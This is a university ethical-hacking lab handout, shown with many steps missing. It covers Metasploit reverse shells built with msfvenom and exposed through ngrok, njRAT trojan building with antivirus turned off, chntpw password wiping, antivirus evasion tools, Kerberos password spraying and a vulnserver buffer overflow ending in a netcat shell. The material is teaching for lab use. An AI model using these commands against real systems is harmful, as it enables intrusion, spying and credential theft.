Professional Documents
Culture Documents
CYS 506 - Lab5
CYS 506 - Lab5
2022/23
IMAM ABDULRAHMAN BIN FAISAL UNIVERSITY
College Department Course
College of Computer Science Networks and Ethical Hacking (CYS
and Information Technology Communications 506)
1- Session Please list the Session Learning Outcomes (SLOs), as presented in the
Outcomes ABET Student Outcomes A to K.
Note: The sequence of instruction may vary and you may start with the most
essential SLO. 1 is the most important one, followed by 2, 3 and 4, as per
time availability.
2- Tool(s)/Software .
• Msfvenom
• Metasploit
• njRAT
3- procedural steps
(Tasks)
System hacking is the process of testing computer systems and software for security
vulnerabilities that an attacker could exploit to gain access to the organization’s
systems to steal or misuse sensitive information.
There are four steps in the system hacking:
• Gaining Access: Use techniques such as cracking passwords and exploiting
vulnerabilities to gain access to the target system.
• Escalating Privileges: Exploit known vulnerabilities existing in OSes and
software applications to escalate privileges.
• Maintaining Access: Maintain high levels of access to perform malicious
activities such as executing malicious applications and stealing, hiding, or
tampering with sensitive system files.
• Clearing Logs: Avoid recognition by legitimate system users and remain
undetected by wiping out the entries corresponding to malicious activities in the
system logs, thus avoiding detection.
Here, we will see how attackers can exploit vulnerabilities in target systems to
establish unauthorized VNC sessions using Metasploit and remotely control these
targets.
Note: To navigate to the Desktop folder, click Places from the top-section of the
Desktop and click Home Folder from the drop-down options. In the attacker
window, click File System from the left-pane and navigate to the location
/root/Desktop.
3- Now, create a directory to share this file with the target machine, provide
the permissions, and copy the file from Desktop to the shared location
using the below commands:
Note: the LHOST is the kali machine IP address, you can find it by
typing ifconfig in the terminal.
8- After entering the above details, type exploit and press Enter to start the
listener.
9- Open any web browser (here, Mozilla Firefox). In the address bar, type
http://10.10.10.13/share and press Enter. As soon as you press enter, it will
display the shared folder contents, as shown in the screenshot.
10- Click Test.exe to download the file.
13- Leave the Windows 10 virtual machine running, so that the Test.exe file
runs in the background and switch to the Kali virtual machine.
14- Observe that one session has been created or opened in the Meterpreter
shell, as shown in the screenshot.
15- Type sysinfo and press Enter to verify that you have hacked the targeted
Windows 10.
16- Now, open another Kali Terminal and navigate to the root directory.
17- In the Terminal window, type git clone
https://github.com/PowerShellMafia/PowerSploit and press Enter. The
PowerSploit repository is downloaded to the root directory.
18- Now, switch back to the Terminal window with an active Meterpreter
session. Type upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1
and press Enter. This command uploads the PowerSploit file (PowerUp.ps1)
to the target system’s present working directory.
19- Type shell and press Enter to open a shell session. Observe that the present
working directory points to the Downloads folder in the target system.
24- This will open a VNC session for the target machine, as shown in the
screenshot. Using this session, you can see the victim’s activities on the
system, including the files, websites, software, and other resources the user
opens or run.
Most of the hacking incidents happens outside your local network (Hacking at a
distance). Ngrok is a tool that creates a secure tunnel from a public endpoint to a
locally running web service. you can use the command line interface to start ngrok
and specify the port number of the local web server that you want to expose. Ngrok
will then create a secure tunnel to the internet, allowing anyone to access your
local web server from anywhere in the world.
1- Using any web browser, access ngrok website (https://ngrok.com/download) and sign
up.
10- Open msfconsole, and type use exploit/multi/handler , then the following options:
• Set payload windows/meterpreter/reverse_tcp
• Set LHOST 0.0.0.0
• Set LPORT 4444
• Set exitonsession false
• exploit -j -z
after you deliver the payload to the victim, and the victim execute the file, a TCP session
establish between the attacker and the victim as in the figure below.
njRAT is a remote access Trojan (RAT) tool that is designed to allow remote access
to a victim's computer system. It is a type of malware that is typically spread
through phishing emails or malicious downloads, and once installed on a victim's
computer, it allows the attacker to perform a variety of actions, such as:
Stealing sensitive data: njRAT can be used to steal passwords, login credentials,
credit card numbers, and other sensitive data from the victim's computer.
Remote control: The attacker can take remote control of the victim's computer,
which means they can access and control the system as if they were physically
present in front of it.
Spying: The attacker can use njRAT to spy on the victim's activities, such as
recording keystrokes or capturing screenshots.
Denial of Service (DoS) attacks: njRAT can be used to launch DoS attacks against
websites or other targets.
Note: ensure that windows defender is turned off and other antivirus
programs.
https://www.technipages.com/how-to-stop-chrome-from-blocking-
downloads/#:~:text=Chrome%3A%20How%20to%20Stop%20the%20Browser%20from%20
Blocking%20Your%20Downloads&text=Go%20to%20Settings%20and%20click,No%20Pro
tection%20(Not%20recommended).
3- Open the downloaded file and double-click on njRAT to start the program.
Note: if the port is used by the system, the application should indicate an error that the
port is busy.
5- The following user interface would appear, down to the right of the window click
on builder.
7- After the trojan is created, save it in the desktop. Double-click the Server.exe file.
8- The trojan will start execution and start a tunnel from the victim’s computer to
the njRAT application.
9- Right-click on the victim’s computer from the njRAT console and click Manager.
11- Click on connections tap in the top of the console. From this tap, you can see all the
victim’s connections and kill the connection.
12- Click on Registry tap in the top of the console. From this tap, you can access
windows registry and modify.
13- Click on Remote Shell from the top of the console. From this tap, you can execute
CMD commands.
14- Now, go back to the main console and click on Remote Desktop.
15- From this service, you can control the victim’s computer.
17- From this service, you can listen to the victim’s microphone.
19- This service will allow the attacker to communicate with the victim.
4- Assessment Plan questions/tasks to confirm that students have achieved each of the
above SLOs. Outcome 1 is the most important one, followed by 2, 3 and
4, as per time availability. The questions/tasks below are just for guidance
and the laboratory instructor can come up with his own questions/tasks.
5- Resources Suggest further resources for the students to manage their learning after the
class. Make sure that the resources are specific and different to suit all
students, e. g. Figures, Tables, Links, etc.
The Ethical Hacking Course is an extensive program that covers various aspects
of hacking, including System Hacking. In the laboratory material for this course,
Part 4: Extra System Hacking Tactics, Techniques, and Procedures is an optional
section that contains additional information for those interested in exploring this
topic more deeply.
It's important to note that Part 4 is not mandatory and is only included for general
knowledge purposes. The laboratory material covers everything that is needed to
understand System Hacking in Parts 1 to 3, which are comprehensive and provide
a solid foundation on this topic.
If you are interested in exploring System Hacking further, Part 4 can be a valuable
resource. This section includes extra tactics, techniques, and procedures that can
be useful for those who want to go deeper into this subject. However, please keep
in mind that this section is optional and not required for the completion of the
course. This part “Part 4: Extra System Hacking Tactics, Techniques, and
Procedures (Optional)” include the following activities:
The Windows login screen is the first screen that appears when a user starts their computer and
prompts the user to enter their username and password to access the operating system. This
screen is an essential security feature that prevents unauthorized users from accessing the
computer's resources and data.
The SAM (Security Accounts Manager) file is a database that stores user account
information, including usernames and password hashes. This file is located in the
Windows/System32/config directory and is only accessible to users with administrative
privileges.
When a user enters their username and password on the Windows login screen, the operating
system compares the password hash stored in the SAM file with the hash of the password
the user entered. If the hashes match, the user is granted access to the computer, and their user
profile is loaded.
It's important to note that the SAM file is a critical component of the Windows security
model and must be protected from unauthorized access. Malicious actors may try to obtain
this file to perform password cracking attacks or gain unauthorized access to a system.
Therefore, it's important to ensure that appropriate access controls and security measures are
in place to protect the SAM file and other sensitive system files.
1- Using a web browser access kali Linux download page, and download kali Live Boot,
in which it will be used to boot the victim’s computer from a USB.
3- Execute Rufus. Choose your USB device from the Device list, then select kali live
boot image and click start.
6- Live Boot kali Linux start page appear, press Enter on Live System (amd64).
10- Now type, cd config. Then type ls | grep SAM to see if the file exists. After this,
type chntpw -i SAM
17- Now the computer without a password and you can access all the files.
The macOS login screen is the first screen that appears when you start up your Mac. It
prompts you to enter your username and password to access your account. The login screen
is usually customized with a background image and displays the names of any user accounts
that have been set up on the computer.
In macOS, user account passwords are stored securely using the Keychain, which is a
password management system built into the operating system. The Keychain stores
passwords, security certificates, and other sensitive information, and it is protected by a
master password that the user sets during account setup.
When you enter your password on the login screen, macOS verifies it by checking it against
the password hash stored in the Keychain. A hash is a mathematical algorithm that converts
a password into a fixed-length string of characters, making it more secure than storing the
password in plain text.
If the password entered on the login screen matches the password hash stored in the Keychain,
macOS grants access to the user account. If the password is incorrect, the user is prompted to
try again or reset the password.
The Linux login screen, also known as the login manager or display manager, is
the graphical user interface that appears when a user boots up their Linux system.
The login screen prompts the user to enter their username and password to gain
access to the system.
The exact appearance of the Linux login screen can vary depending on the
distribution of Linux being used and the chosen desktop environment. However,
common elements typically include a login prompt, password field, and a list of
available users. Some login screens may also include additional features such as
password strength indicators, session selection, and accessibility options.
Like any software, the Linux login screen can potentially have vulnerabilities that
could be exploited by malicious actors. Common vulnerabilities in login screens
can include weaknesses in authentication mechanisms, password brute-forcing
vulnerabilities, buffer overflow vulnerabilities, and root access.
To mitigate these risks, Linux developers and security experts regularly perform
security audits and patches to address any vulnerabilities discovered in the login
screen or other components of the operating system. Users can also take steps to
enhance the security of their login screen, such as using strong and unique
passwords, enabling two-factor authentication, and ensuring that their system
software is up to date.
4- Type, passwd root and enter. Then provide the password of the root.
5- reboot the system and you will see that the root account password changed.
In a Windows environment, there are several levels of privileges that a user can have, ranging
from basic user-level access to administrator-level access. Basic user-level access is the
most restrictive, while administrator-level access allows a user to make changes to the
system configuration, install software, and perform other privileged operations.
An attacker who gains access to a Windows system with basic user-level access may attempt
to escalate their privileges to administrator-level access to gain more control over the
system. There are several techniques that attackers may use to achieve this goal, including:
To prevent privilege escalation attacks, it is important to follow best practices for securing
Windows systems, such as using strong passwords, limiting administrative access to only
those who need it, keeping software up-to-date with security patches, and using security
tools like firewalls and anti-virus software.
1- Open your kali machine and open a new Terminal and type msfvenom -p
windows/meterpreter/reverse_tcp –platform windows -a x86 -f exe
LHOST=<your IP> LPORT=4445 -o /var/www/html/PrivilegeEsclation2.exe
3- using a web browser in the victim’s machine, access your IP address and run the
program.
7- Now, type run. As you can see that the privileges is already escalated, but in other
users, a new meterpreter powershell session will start.
Polymorphic code: Malware creators use polymorphic code to change the structure
of the malware in a way that makes it difficult for antivirus software to detect.
The code is changed every time the malware is executed, making it hard to identify
a specific pattern.
Code obfuscation: Malware creators use code obfuscation to hide the true intent of
the code. This makes it harder for antivirus software to identify the code as
malicious.
Encryption: Malware creators use encryption to hide the true nature of the
malware. The malware is encrypted in a way that it cannot be read by the
antivirus software, making it difficult to detect.
2- In the terminal, type cd <path to ThFatRat>, then type chmod -R 755 <path to
ThFatRat>. Then type ./setup.sh
8- Type the backdoor name, and name the auto files Auto.
12- Take the backdoor and place it in /var/www/html. Then in the terminal type, service
apache2 start. In your windows machine access the kali IP from a web browser and
download the backdoor while the windows defender in turned on.
Advanced antivirus evasion techniques are used by malware authors to evade detection by
antivirus software. These techniques are designed to make it more difficult for antivirus
software to identify and remove malicious code from infected systems.
1- Download SwayzCryptor and open the program. Press on the 3 dots on File.
3- Now, press on the 3 dots in the icon and choose and .ico file.
A USB Rubber Ducky is a type of USB device that looks like a regular USB flash
drive but is actually a tool used for penetration testing and other security-related
tasks. The device is designed to simulate a keyboard, allowing it to execute pre-
programmed keystrokes and commands on a target computer. The keystrokes can
be programmed to perform a wide range of actions, such as opening a command
prompt, launching a script, or running a malicious payload.
The USB Rubber Ducky is often used by security professionals for testing the
security of computer systems and networks, as well as for educational purposes.
It can be used to test the effectiveness of security measures and identify potential
vulnerabilities in computer systems.
The USB Rubber Ducky is designed to work with any operating system that
supports USB keyboards, including Windows, macOS, and Linux. Once the device
is plugged into a target computer, it will execute the pre-programmed keystrokes
and commands, which can be used to perform a wide range of tasks.
While the USB Rubber Ducky can be a powerful tool for security testing, it can
also be used for malicious purposes, such as stealing sensitive data or installing
malware on a target computer. As such, it is important to use the device
responsibly and only for legitimate purposes. It is also important to take steps to
protect against USB-based attacks, such as disabling USB ports or using USB
data blockers to prevent data transfer.
11- The USB drive in this case is volume D and click OK.
Note: the drive volume and location might differ in your lab environment.
Kerbrute is a tool used for password spraying and brute-forcing attacks against
the Kerberos authentication protocol. It can be used to test the strength of user
passwords or to attempt to gain unauthorized access to an Active Directory
environment.
Password spraying: The attacker uses Kerbrute to test a list of commonly used
passwords against a large number of user accounts in the target Active Directory
environment. This is done to identify weak passwords that can be used to gain
access.
Privilege escalation: Once the attacker gains access to a user account, they may
attempt to escalate their privileges to gain access to more sensitive information or
resources in the network.
Lateral movement: The attacker may then attempt to move laterally through the
network by compromising additional user accounts or exploiting vulnerabilities in
other systems to gain access to additional resources.
Data exfiltration: Finally, the attacker may attempt to exfiltrate sensitive data
from the network, which can be used for malicious purposes such as identity theft
or financial fraud.
2- Press on“Kerbrute_linux_amd64”
8- We can also list the folders in the computer of the user. Type crackmapexec smb -u
<user> -p <password> --shares
To use RDP, both the remote computer and the local computer must have RDP
client software installed. The local computer initiates a connection to the remote
computer by specifying its IP address or hostname and providing valid login
credentials. Once connected, the user can control the remote computer using their
keyboard and mouse.
RDP is a secure protocol that uses encryption to protect the transmission of data
between the local and remote computers. However, it is important to ensure that
RDP is configured securely to prevent unauthorized access and data breaches.
However, RDP is also a common target for attackers who seek to exploit its vulnerabilities to
gain unauthorized access to a remote computer. Some common RDP exploits include:
Brute Force Attacks: Attackers attempt to guess the login credentials for a remote desktop
using a list of common passwords or dictionary attacks. If successful, the attacker gains full
control over the target machine.
BlueKeep Exploit: BlueKeep is a security vulnerability that affects older versions of Microsoft
Windows operating systems, including Windows 7 and Windows Server 2008. The exploit
allows an attacker to gain full access to a target computer without authentication.
Man-in-the-Middle Attacks: Attackers intercept RDP traffic between the client and the
server, allowing them to eavesdrop on communications and steal sensitive information.
Denial-of-Service (DoS) Attacks: Attackers flood the RDP server with traffic, causing it to
crash or become unresponsive. This prevents legitimate users from accessing the server.
4- On your kali machine, open a new terminal and type nmap -p 3389 –script rdp-
enum-encryption <Server IP>
FTP, or File Transfer Protocol, is a standard communication protocol used to transfer files over
the internet or other networks. It was first introduced in 1971 and has since undergone several
revisions to improve its functionality.
FTP works on a client-server model where the client computer requests files from the server
computer, which then sends them back to the client. The client and server communicate over a
TCP/IP network using a series of commands and responses.
FTP supports two modes of data transfer: ASCII and binary. ASCII mode is used for
transferring text files, while binary mode is used for transferring non-text files such as images,
audio, and video files.
FTP also supports user authentication, allowing users to log in to the server with a username
and password. Once authenticated, users can access their files on the server, download files
from the server, or upload files to the server.
vsFTPd (Very Secure FTP daemon) is an open-source FTP server that is used to transfer files
over the Internet. In the past, vsFTPd has been vulnerable to a number of security issues. Here
are some of the most notable vulnerabilities:
Backdoor in vsFTPd 2.3.4: In July 2011, it was discovered that the official vsFTPd download
site had been compromised and a backdoor had been added to the vsFTPd 2.3.4 tarball. This
backdoor allowed attackers to gain remote access to a system running the compromised version
of vsFTPd.
Denial of Service (DoS) vulnerability in vsFTPd 2.3.2: In August 2010, a DoS vulnerability
was discovered in vsFTPd 2.3.2. This vulnerability could be exploited by a remote attacker to
crash the vsFTPd server.
It's worth noting that these vulnerabilities have been patched in newer versions of vsFTPd. It's
important to keep your software up to date to avoid known vulnerabilities.
2- In your kali machine, create a new terminal and type, nmap -p 21 –script=vuln
<server IP>
SMB (Server Message Block) is a network protocol used for sharing files, printers, and other
resources between computers on a network. It was originally developed by Microsoft for use
in its Windows operating system but has since been adopted by other platforms as well.
The SMB service allows computers on a network to access shared resources on other
computers. This is done by establishing a connection between the client (the computer
requesting the resource) and the server (the computer hosting the resource) using the SMB
protocol.
SMB provides a set of commands that allow the client to access files and other resources on
the server. These commands include opening and closing files, reading and writing data, and
listing the contents of directories.
The MS17-010 vulnerability is a critical remote code execution vulnerability that affects the
Microsoft Server Message Block (SMB) protocol. This vulnerability was discovered by the
National Security Agency (NSA) and leaked by a group called Shadow Brokers in April 2017.
The MS17-010 vulnerability can be exploited using a number of methods, including the
popular Psexec tool. Psexec is a legitimate and widely used remote administration tool that can
be used to remotely execute processes on a target system. However, in the hands of an attacker,
it can also be used to exploit the MS17-010 vulnerability and gain unauthorized access to a
system.
To protect against this vulnerability, Microsoft released a security patch in March 2017.
It is recommended that organizations apply this patch immediately to prevent exploitation of
the MS17-010 vulnerability. Additionally, organizations should also implement best practices
such as disabling SMBv1, segmenting their networks, and using strong passwords to further
reduce the risk of exploitation.
5- Then type exploit. And by now, you gained access to the system.
SSH (Secure Shell) is a protocol used for secure remote access to networked
systems. It is a cryptographic network protocol that provides a secure way to
access a remote system over an unsecured network. SSH provides secure
authentication and encryption of data transferred between the client and the
server.
When a user connects to a remote server using SSH, the server authenticates the
user's identity using various methods such as passwords, public key cryptography,
or two-factor authentication. Once authenticated, the user can execute commands
on the remote system as if they were sitting in front of it. SSH encrypts all data
transmitted between the client and server, providing protection against
eavesdropping and tampering.
Whether or not it is safe to turn on the SSH service depends on the specific use
case and security requirements of the system. SSH itself is a secure protocol, but
as with any networked service, there are risks associated with enabling remote
access to a system. If the system has weak passwords or is otherwise vulnerable
to attack, enabling SSH could increase the risk of unauthorized access.
In general, it is important to follow best practices for securing SSH access, such
as using strong passwords or public key authentication, disabling root login, and
limiting access to trusted users. Additionally, regularly updating the SSH
software to address any known security vulnerabilities is also important to
maintain the security of the service.
Both macOS and Linux are operating systems that belong to the family of Unix-
like operating systems. While they share some similarities, there are also some
key differences between the two.
Linux, on the other hand, is an open-source operating system that is based on the
Unix operating system. It is developed collaboratively by a community of
programmers and is available for free. Linux is known for its stability, security,
and customizability. It is used in a wide range of applications, from servers to
desktop computers to embedded devices like smartphones and routers. Linux is
also popular among developers and programmers because of its command-line
interface (CLI) and the vast array of tools and utilities available to them.
One key difference between macOS and Linux is that macOS is developed and
distributed exclusively by Apple, while Linux is developed collaboratively by a
community of programmers and is available for free. Another difference is that
macOS is designed to run only on Apple hardware, while Linux can run on a wide
range of hardware platforms. Finally, macOS is known for its user-friendly GUI,
while Linux is known for its flexibility and customizability.
4- In the other hand, transfer the payload to a MacOS system, and open the
terminal and type python3 <path to the payload>, then press enter
1- Open any web browser and access the following link and download
Vulnserver (https://github.com/stephenbradshaw/vulnserver). Press on
Download ZIP
7- The Select process to attach pop-up appears; click the vulnserver process
and click Attach.
11- Keep Immunity Debugger and Vulnserver running, and switch to the Kali
Linux virtual machine.
12- In the Terminal window, type nc -nv 10.10.10.10 9999 and press Enter.
13- Type HELP and a list of Valid Commands is displayed, as shown in the
screenshot.
18- Through fuzzing, we have understood that we can overwrite the EIP register
with 1 to 5100 bytes of data. Now, we will use the pattern_create Ruby tool to
generate random bytes of data.
20- It will generate a random piece of bytes; right-click on it and click Copy to
copy the code and close the Terminal window.
22- Paste the data generated in step 20 in offset variable, then save the file.
23- In the terminal, type python3 attack.py, then provide vulnserver IP.
24- In the Immunity Debugger window, you can observe that the EIP register is
overwritten with random bytes. Note down the random bytes in the EIP and
find the offset of those bytes.
26- A result appears, indicating that the identified EIP register is at an offset of
2003 bytes, as shown in the screenshot.
30- Switch to the Windows 10. You can observe that the EIP register is
overwritten, as shown in the screenshot.
Note: The result indicates that the EIP register can be controlled and overwritten
with malicious shellcode.
37- In the left-corner window, you can observe that there are no badchars that
cause problems in the shellcode, as shown in the screenshot.
40- copy the mona.py script, and paste it in the location C:\Program Files
(x86)\Immunity Inc\Immunity Debugger\PyCommands.
41- Switch to the Immunity Debugger window. In the text field present at
bottom of the window, type !mona modules and press Enter.
42- The Log data pop-up window appears, which shows the protection settings of
various modules.
43- You can observe that there is no memory protection for the module
essfunc.dll, as shown in the screenshot.
44- Now, we will exploit the essfunc.dll module to inject shellcode and take full
control of the EIP register.
45- In the Terminal window, type /usr/share/metasploit-
framework/tools/exploit/nasm_shell.rb and press Enter.
Note: This script is used to convert assembly language into hex code.
46- The nasm command line appears; type JMP ESP and press Enter.
47- The result appears, displaying the hex code of JMP ESP (here, FFE4).
Note: Note down this hex code value.
Note: Here, the return address of the vulnerable module is 0x625011af, which
might differ in your lab environment.
54- The Enter expression to follow pop-up appears; enter the identified return
address in the text box (here, 625011af) and click OK.
55- You will be pointed to 625011af ESP; press F2 to set up a breakpoint at the
selected address, as shown in the screenshot.
56- Now, click on the Run program icon ( ) in the toolbar to run Immunity.
57- Now switch to kali Linux and, download jump.py from (https://udksa-
my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EQrum-
AoNLpJn66W4AfnLiYB5CJF1UsjVtgtR5kt-h3J-w?e=Nh5DRr)
58- In the Terminal, type python3 jump.py
59- In the Immunity Debugger window, you will observe that the EIP register
has been overwritten with the return address of the vulnerable module, as
shown in the screenshot.
Note: You can control the EIP register if the target server has modules without
proper memory protection settings.
68- Now, paste the shellcode copied in Step#65 in the overflow option (Line 4);
then, press Ctrl+S to save the file and close it.
69- In the Terminal window, type nc -nvlp 4444 and press Enter. Netcat will start
listening on port 4444, as shown in the screenshot.
70- Switch back to the other Terminal window. Type chmod +x shellcode.py and
press Enter to change the mode to execute the Python script.
71- Type ./shellcode.py and press Enter to execute the Python script.
72- Now, switch back to the Terminal running the Netcat command.
73- You can observe that shell access to the target vulnerable server has been
established, as shown in the screenshot.
74- Now, type whoami and press Enter to display the username of the current
user.